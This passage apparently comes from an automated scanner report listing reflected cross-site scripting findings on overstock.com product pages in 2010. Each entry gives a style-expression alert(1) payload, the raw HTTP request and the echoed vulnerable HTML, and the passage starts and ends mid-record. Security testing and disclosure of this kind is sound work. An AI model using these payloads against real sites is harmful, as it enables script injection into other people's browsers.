Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 102883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="b828a"style="x:expression(alert(1))"fb590d8c4d9" value="1"/>
...[SNIP]...

2.140. http://www.overstock.com/Home-Garden/Anchor-Hocking-4-piece-Stemless-Wine-Glass-Set/3600831/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Anchor-Hocking-4-piece-Stemless-Wine-Glass-Set/3600831/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35c48"style%3d"x%3aexpression(alert(1))"d00ea22d41f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35c48"style="x:expression(alert(1))"d00ea22d41f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Anchor-Hocking-4-piece-Stemless-Wine-Glass-Set/3600831/product.html?35c48"style%3d"x%3aexpression(alert(1))"d00ea22d41f=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:32:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:32:41 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3600831|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:41 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406761354:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:41 GMT; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107896

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="35c48"style="x:expression(alert(1))"d00ea22d41f" value="1"/>
...[SNIP]...

2.141. http://www.overstock.com/Home-Garden/Andiamo-Solid-500-Thread-Count-Egyptian-Cotton-Sheet-Set/4064061/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Andiamo-Solid-500-Thread-Count-Egyptian-Cotton-Sheet-Set/4064061/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79031"style%3d"x%3aexpression(alert(1))"8e8f24245d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79031"style="x:expression(alert(1))"8e8f24245d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Andiamo-Solid-500-Thread-Count-Egyptian-Cotton-Sheet-Set/4064061/product.html?79031"style%3d"x%3aexpression(alert(1))"8e8f24245d4=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:38:09 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:38:09 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407089801:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:38:09 GMT; Path=/
Set-Cookie: mxcproclicks=4064061|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:38:09 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 124093

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="79031"style="x:expression(alert(1))"8e8f24245d4" value="1"/>
...[SNIP]...

2.142. http://www.overstock.com/Home-Garden/Antique-Chic-3-piece-Quilt-Set/2521006/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Antique-Chic-3-piece-Quilt-Set/2521006/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c96b"style%3d"x%3aexpression(alert(1))"bf9819b8bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c96b"style="x:expression(alert(1))"bf9819b8bd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Antique-Chic-3-piece-Quilt-Set/2521006/product.html?9c96b"style%3d"x%3aexpression(alert(1))"bf9819b8bd6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:49:39 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:49:39 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289407779075:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:49:39 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2521006|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:49:39 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118364

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="9c96b"style="x:expression(alert(1))"bf9819b8bd6" value="1"/>
...[SNIP]...

2.143. http://www.overstock.com/Home-Garden/Antique-Chic-5-piece-Quilt-Set/3915400/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Antique-Chic-5-piece-Quilt-Set/3915400/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e04af"style%3d"x%3aexpression(alert(1))"f07952690ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e04af"style="x:expression(alert(1))"f07952690ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Antique-Chic-5-piece-Quilt-Set/3915400/product.html?e04af"style%3d"x%3aexpression(alert(1))"f07952690ed=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:50:30 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:50:30 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:50:30 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3915400|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:50:30 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407830596:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="e04af"style="x:expression(alert(1))"f07952690ed" value="1"/>
...[SNIP]...

2.144. http://www.overstock.com/Home-Garden/Antique-Chic-Bedspread-Set/3570941/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Antique-Chic-Bedspread-Set/3570941/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bae"style%3d"x%3aexpression(alert(1))"51e68b0838 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5bae"style="x:expression(alert(1))"51e68b0838 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Antique-Chic-Bedspread-Set/3570941/product.html?e5bae"style%3d"x%3aexpression(alert(1))"51e68b0838=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:48:58 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:48:58 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=3570941|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:58 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407738493:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:58 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=32
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114205

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="e5bae"style="x:expression(alert(1))"51e68b0838" value="1"/>
...[SNIP]...

2.145. http://www.overstock.com/Home-Garden/Antique-Rose-Quilt-Set/1720379/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Antique-Rose-Quilt-Set/1720379/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0b76"style%3d"x%3aexpression(alert(1))"ef556a36a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0b76"style="x:expression(alert(1))"ef556a36a9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Antique-Rose-Quilt-Set/1720379/product.html?f0b76"style%3d"x%3aexpression(alert(1))"ef556a36a9f=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:50:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:50:19 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:50:19 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=1720379|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:50:19 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407819167:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=32
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116034

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="f0b76"style="x:expression(alert(1))"ef556a36a9f" value="1"/>
...[SNIP]...

2.146. http://www.overstock.com/Home-Garden/Ashton-Cube-Ottoman/3915075/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Ashton-Cube-Ottoman/3915075/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b61"style%3d"x%3aexpression(alert(1))"d61e9bb0077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35b61"style="x:expression(alert(1))"d61e9bb0077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Ashton-Cube-Ottoman/3915075/product.html?35b61"style%3d"x%3aexpression(alert(1))"d61e9bb0077=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:45 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:45 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:45 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3915075|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:45 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408085313:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=3
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112585

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>As
...[SNIP]...
<input type="hidden" name="35b61"style="x:expression(alert(1))"d61e9bb0077" value="1"/>
...[SNIP]...

2.147. http://www.overstock.com/Home-Garden/Augusta-Chocolate-8-piece-Bed-in-a-Bag/4600850/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Augusta-Chocolate-8-piece-Bed-in-a-Bag/4600850/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c3eb"style%3d"x%3aexpression(alert(1))"c04395c6a01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c3eb"style="x:expression(alert(1))"c04395c6a01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Augusta-Chocolate-8-piece-Bed-in-a-Bag/4600850/product.html?2c3eb"style%3d"x%3aexpression(alert(1))"c04395c6a01=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
